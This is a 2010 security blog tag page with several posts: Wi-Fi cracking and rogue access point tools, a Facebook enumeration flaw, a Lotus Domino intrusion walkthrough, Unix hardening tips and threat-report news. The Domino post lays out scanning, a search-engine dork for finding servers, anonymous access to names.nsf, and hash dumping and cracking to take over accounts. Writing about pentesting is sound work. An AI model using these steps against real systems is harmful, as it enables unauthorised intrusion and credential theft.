Posts Tagged Security
Wardriving These Days (Part 2)
Posted by Mourad Ben Lakhoua in Pentesting, Tools on August 20, 2010
Tools for the first part may not be completed without SpoonWEP/SpoonWPA which firstly introduced in BackTrack3, this is also a part of aircrack-ng with a graphical interface allows pentester to take the same channel of the Access point and crack the security keys of the AP.
Another very interesting tool is Karmetasploit which allows you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients.
Wireless penetration testing does not exist as programs only as in Backtrack but you can find a ready solution as the wifi peanaple. which is a nice trick that any person at home, the office, coffee shops or airports will not doubt that the peanaple contains a rogue access point that may conduct a Man in the middle attack and have all users credential, the price of WiFi Pineapple is 119$.
When any person turn on their laptops the wireless network software automatically connects to access points they remember. So the laptop starts to send out beacons. These beacons say “Is such-and-such wireless network around?” , wifi peanaple replies to these beacons and says “Sure, I’m such-and-such wireless access point – let’s get you online!”.
WiFi Pineapple is powered over battery and wireless hacking device based on the Fon 2100 access point.
make sure you subscribe to my RSS feed!
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
New Vulnerability has been discovered in facebook that allows an attacker to obtain all users credential on the social network website. By having the email address an attacker can get the name and pictures of victims.
The vulnerability can works regardless of the account privacy settings, this mean that even if your account hidden from all search engines it is possible to have the sensitive information.
The result of gathered information can be used for phishing attacks or any other issue.
According to the researchers if someone has a list of email address that he has no clue about. He can feed them to Facebook one by one (or in a list, using a script like this) and chances are that he’ll get more than 50% hits. Useful for phishing attacks (People will get more convinced when they see their *real* names).
Or an attacker can randomly generate email addresses and create a database with user’s names and pictures, which mean that you have no privacy and your information, can be easily found.
Update :
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
make sure you subscribe to my RSS feed!
Wardriving These Days (part 1)
Posted by Mourad Ben Lakhoua in Pentesting, Tools on August 1, 2010
In the past it has been very difficult to crack wireless network we should search for the right software under Linux distribution checking the necessary driver compatibility to inject the packet on the network and finally you get access to the Wi-Fi network, the question do we still have the same difficulties today?
To answer this question we will be searching some online resources to prepare the correct distrubution and making it easy to get the required tools within few steps to evaluate any wireless network.
Today we can find two types of wireless network the first are non-encrypted network that’s mean you will need just a wireless device to be connected, second are using encryption under three forms WEP encryption which is also not any more secure because it can be cracked within few minutes and for 100% but we rarely find this type of encryption, Now most network are encrypted using WPA/WPA2 encryption.
First you need to get a Backtrack copy and you can make it on USB stick using UNetbootin, So you can have it with you everywhere , even if you forget your laptop you pull the USB and you boot on it to have all required tools to do your work.
Now you should check your wireless adapter to be sure that it can work on mode monitoring and this can be made by visiting Aircrack-ng portal.
This will make you ready to use latest tools for wardriving the first one is AUTOMATIC WPA HANDSHKE CAPTURE this tool is a Python script that helps you to get WPA handshakes, what you need to have is the Wlan interface, both Mac addresses of the AP/Client and as a result you will receive the dump traffic with the Handshake.
GerixWiFiCracker is a tool that can be as an extra add to Aircrack-ng for using it you just go to configuration settings and select the interface than press (Start Sniffing and Logging) and (perform a test of injection AP). By using Gerix you can also create a fake AP on the desired channel so your pc will respond to any probe request with a proper probe response, which tells the client to authenticate to the BSSID as in the airbase-ng this will also disrupt all AP on the same channel.
These tools come as update for all previous wireless penetration testing mentioned on SecTechno and there still others to come.
To be continued….
make sure you subscribe to my RSS feed!
Hacking Lotus Domino
Posted by Mourad Ben Lakhoua in Password Security, Pentesting, Vulnerabilities on July 12, 2010
IBM Lotus Domino Server is a solution for the corporate environment that provides different services to manage electronic documents, and it includes many models such as Mail server, Http server and Data base. The current version is Lotus Domino 8.5.1.
To detect the server we start by scanning the network, usually the server runs a web interface Lotus Domino httpd, so we run Nmap and scan the targeted network as follows:
Nmap –sV 172.16.1.0.24 –p 80
Nmap scan report for 172.16.1.7
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80 open http Lotus Domino httpd
Now as you can see the IP address of the Domino server is found and you can open your web browser to check some nice Domino web pages with the version: http://serverip/homepage.nsf.
You can use the Google Hack method to find all web servers running on Domino by searching for inurl:homepage.nsf. In the results you will find thousands of Domino based web pages. Now it is very important to note that you should not attempt training yourself on these sites.
Usually when you install Lotus client you need to connect as a user to the server, and a screen for authentication appears to make non experienced hackers terrified, but if you concentrate and check everything slowly you will find the gaps and admin faults.
First you start by learning the important resources on the server, on Domino most important files are with the .NSF extension, so we have:
/Names.nsf File in Domino server contains file name and path (Most important database in the Domino environment)
You can find other files using DominoHunter which provides you a list on all .nsf files. But what we need is the names.nsf database which includes all mail addresses, users information, users operating systems, security applications on Lotus notes and other important information.
What is interesting that on most Domino servers this file can be accessed by anonymous users =-).
Now the kind of information that we will need take care of:
1. List of user’s login so we can guess there passwords also which user account is the admin.
2. All information can be used in the social engineering to trick non trained personal.
3. In the names.nsf you will find also OS version as lotus notes client version this will be very helpful to find the 0-days for all users and application and OS. Here an attacker can use even vulnerability in Internet explorer to compromise some accounts.
Gathering information is not all what is possible – in 2005 there someone discovered a vulnerability allows an attacker to get Internet users password hash. The vulnerability is not difficult to exploit because all users hash passwords are stored in Hidden HTTPPassowrd or dspHTTPPassword files, depending on the version.
What is strange that this vulnerability remains unfixed.
Now the number of users can be hundreds or thousands, so you will need to have all hashes in automatic way. On 2007 an exploit has been released for Dumping Password Hash Raptor_dominohash that allows downloading of all users’ hashes.
DominoHashBreaker is also an important tool that tries to find the clear text form of the password by utilizing a dictionary attack. The goal is to make it possible for an administrator to check the robustness of the passwords of its users.
But for the best results, John the Ripper with Jumbo patch – which adds modern password hashes – and all you need is give HASH.txt to JohnTheRipper (in the form username:hash). If you find one account password you will be able to know the password policy for all users and will not consume much time to have all passwords list. And these passwords are for Domino web access.
If we have the administrator password account, then its ok, if not we should repeat the previous steps. Something interesting is that the admin password will allow attacker to open webadmin.nsf (servername/webadmin.nsf) this is for administrating Lotus Domino webserver interface, and by getting access to this resource you can add, remove or modify users.
On domino there is another protocol which is NRPC using port 1352, and this allows users to have client Lotus notes and Lotus designer, and the client should have a certificate to approve his identity with extension ID. There is also a password authentication mechanism.
Passwords are used to decrypt the ID file, so to have access to any Domino account we will need 2 things: an ID file and password for this file. This is more complicated than the Web access but it is always possible.
To get the ID file you can exploit a vulnerability in Lotus Domino where the server keeps a copy of the ID stored on the server, so if you have users login as shown using names.nsf. you will have the ID for the password there is 3 tools that can search for the ID password which is ( ID Password recovery, Lotus Notes Password Recovery or Notes Password Recovery by following this link ,all three tools for free.
This post presents a clear idea about the different configuration faults that can exist in a Domino server with a small vulnerability that can allow an outsider to take full control of the server and manipulate a corporation’s very sensitive information.
Reference: http://dsecrg.com/pages/pub/show.php?id=2
make sure you subscribe to my RSS feed!
Fake Windows IME Trojan
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Vulnerabilities & attacks on July 11, 2010
Security researchers at Websense have discovered a new Trojan that are using a windows system to disable and delete antivirus software and compromising victim machine.
The Malicious program installs itself as the Windows input method editor (IME) and then stop all AV processes and delete the executable files and mask itself in the system as an antivirus update package.
Websense has issued a blog post defining the way that this Trojan is able to infect windows system. After running the malware a winnea.ime will be created under the system folder in windows.
By opening the default input method, the previous created file winnea.ime will start to search and detects antiviruses.
At the same time, winnea.ime creates a file called pcij.sys to the system folder and loads it as a driver process.
Next DeviceIOControl kills the running process of any antivirus in the list; the control code is sent to the driver process pcij.sys
As it is clear that the input method in Windows is now a popular way for hackers to inject malicious code.
make sure you subscribe to my RSS feed!
Black Hat USA 2010
Posted by Mourad Ben Lakhoua in Security events, hacking on July 11, 2010
By the end of this month in Las Vegas there will be the interesting meeting Black Hat USA 2010, where will be presented new vulnerabilities, tools and programs.
BlackHat is the most important and biggest hacking event on the planet, it attracts thousands of experts around the world. This year BlackHat celebrates the 13 Years Anniversary. Among the conferences we can find Cyber War discussion by General Michael V. Hayden, former director of the National Security Agency and Central Intelligence Agency.
There will be about 30 new vulnerabilities, 46 tools and 25 independent researchers will be demonstrating latest cutting-edge Technology.
Widely known speakers will contribute to the event including:
• “Cyber war…Are we at war? And if we are, how should we fight it?” presented by General Michael V. Hayden, former Director, National Security Agency and Central Intelligence Agency
• “Jackpotting Automated Teller Machines Redux” by Barnaby Jack
• “Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios” by Shawn Moyer and Nathan Keltner
• “How to Hack Millions of Routers” by Craig Heffner
• “These Aren’t the Permissions You’re Looking For” by Anthony Lineberry
• “App Attack: Surviving the Mobile Application Explosion” by John Hering and Kevin Mahaffey
• “Hacking and Protecting Oracle Database Vault” by Esteban Martinez Fayo
• “Token Kidnapping’s Revenge” by Cesar Cerrudo
• “HTTPS Can Byte Me, Robert Hansen” by Josh Sokol
• “USB – HID, The Hacking Interface Design” by Richard Rushing.
for More information you can visit the Official website.
make sure you subscribe to my RSS feed!
Keep Your Unix-Based System Safe This Summer (Part2)
Posted by Mourad Ben Lakhoua in Best Practices, Open-Source, Operating System, Safety rules, Software Security on July 5, 2010
System monitoring is the most important method for detecting all kinds of Trojans, viruses and any malicious activities on the system.
Maintaining control over file integrity can be acheived by installing a tripewire which has the ability to detect changes on each system on which it is installed, checks the integrity of normal binaries and reports any changes to syslog or by email, and alerting users to intrusions and unexpected changes with the available source code.
After installing the tripwire (using command: $ Sudo apt-get install tripwire) you will need to answer some questions regarding the configuration, and by the end you need to enter a password of at least 8 characters (twice).
The script generates keys for your site (host) and then asks you to enter a password (twice) for local use. You should then back up and delete the original plain-text files installed on the system.
Developers have made the appropriate policy for all files and configurations, but if you need to update or change something you can make the change at the file in /etc /tripwire/tw.pol.
Actually, the tripwire creates a database with snapshot of your file system, it uses this baseline along with the encrypted configuration and policy settings under the /etc/tripwire directory to monitor the status of your system.
Now you can perform a test scan:
$ Tripwire – check
The check will be on a daily bases and will report all changes, including the normal tasks allowed once like editing system configuration files, installing packages, etc … and all reports on the changed files will be sent to the root by email.
Final three points are:
* Keeping track of all access accounts, all important system configuration files should be readable and writable only by root. Home directory can be accessed only by you (600).
* Do not place users in many groups because group membership gives users special access to files and directories which are permitted to that group. Such as operator, audio, etc, this can creates a hole and gives user a special privilege not needed.
* Root privileges are needed only when they are really required. No need to run commands as root and if you really need to install or manipulate something, use sudo.
So make sure to apply all these security rules for a safe 2010 Summer.
make sure you subscribe to my RSS feed!
(Picture from Scott Ableman)
Keep Your Unix-Based System Safe This Summer (Part1)
Posted by Mourad Ben Lakhoua in Best Practices, Open-Source, Safety rules on June 27, 2010
Protecting your systems against all manner of intrusions will provide more safety for your virtual life, by using complex passwords and a regular file check against changes, plus restricting anything and everything will keep these threats away.
Computersremain the easiest point to compromise if there is a physical access. At schools, universities, cafes or the airport many people use their computers without locking the session.
Lock screen comes as the first and most important reflex to protect your machines physically. Locking the screen is possible over a keyboard combination:
Ctrl+Alt+L (KDE and Gnome) and Ctrl+Alt+Del (Xfce). The same can be done from the command line: KDE $ qdbus org.freedesktop.
ScreenSaver / ScreenSaver Lock
Gnome $ gnome-screensaver-command-l
Xfce $ xflock
For other cases, you can use the command:
$ Xscreensaver-command-lock
Or you can install program from xlock, xscreensaver if not activated. The console is an analog vlock. This will help in Locking Popular text window managers, such as GNU Screen and Tmux that we mentioned on a previous post.
Locking the screen will not bring much benefit if we are keeping the Boot from CD/USB on Bios level enabled, because there are many Linux Live CD that can help in removing different session passwords.
Booting from any media except from the hard disc should be disabled, and set a password on the CMOS setup. For better reliability, reset the file/etc/security where entry is possible under the account root.
If a person managed to steal your password, you can use command last to display a list of all users logged in (and out) since that file was created or check file (~ /. history, ~ /. bash_history) for logs.
Then there are some important things to do while Installing or using the system:
1 – Do not click on icons that you do not know, as various malicious commands UNIX-shell that can be masked.
2 – Do not use the configuration files without reading them.
3 – Do not install software patches without reading their contents, or at least make sure that they were obtained from reliable sources. There is no guarantee that the patch does not contain backdoors, malicious code.
4 – Do not install packages manually from other websites. All normal distribution has a remote repository, in which all packages have a verification hash code. In an extreme case, download the package from sites that identify themselves using certificates.
5 – Always download into a temporary subdirectory of your home directory and check their content before unpacking.
6 – Create a file «-i» in the root directory (touch /-i). This will make as user permission before deleting each file in the root directory.
In next part we will be looking further for different configuration to make your Unix-Based system safe this summer.
make sure you subscribe to my RSS feed!
Security Acts Magazine No.3
Posted by Mourad Ben Lakhoua in Security Magazine on June 21, 2010
The third edition of Security Acts Magazine has been issued. This number includes a small and hopefully interesting article I have submitted on the Wireless penetration testing (War driving).
Wish you a happy reading!
http://www.securityacts.com/securityacts03.pdf
make sure you subscribe to my RSS feed!
McAfee 2010 First Quarter Threat Report
Posted by Mourad Ben Lakhoua in Anti-Viruses, News on May 19, 2010
McAfee has issued the regular quarterly Threat report, which pointed to major network threats in the first quarter of this year, during this period the biggest threat to computers was USB malicious software. Attackers continue to enjoy the ability to launch applications automatically from external devices.
The report also stated the increasing of fake AV products with expanding their activities in this period. As for Spam the detected number for this part is about 139 billion spam messages, which mean about 89% of the total email number. 71% of emails are related to medical spams, 10 % for general category and 2% of spams for fake educational diploma or degrees. The leaders of these spams are China, South Korea and Vietnam.
McAfee also said that malware and spam in Thailand, Romania, the Philippines, India, Indonesia, Colombia, Chile and Brazil had surged with the increasing number of internet usage.
Comparing to the last two years the total number of malicious program for this period has decreased, however they expect that for next part the number of viruses will remain the same as last year.
make sure you subscribe to my RSS feed!
SUBSCRIBE
Latest Comments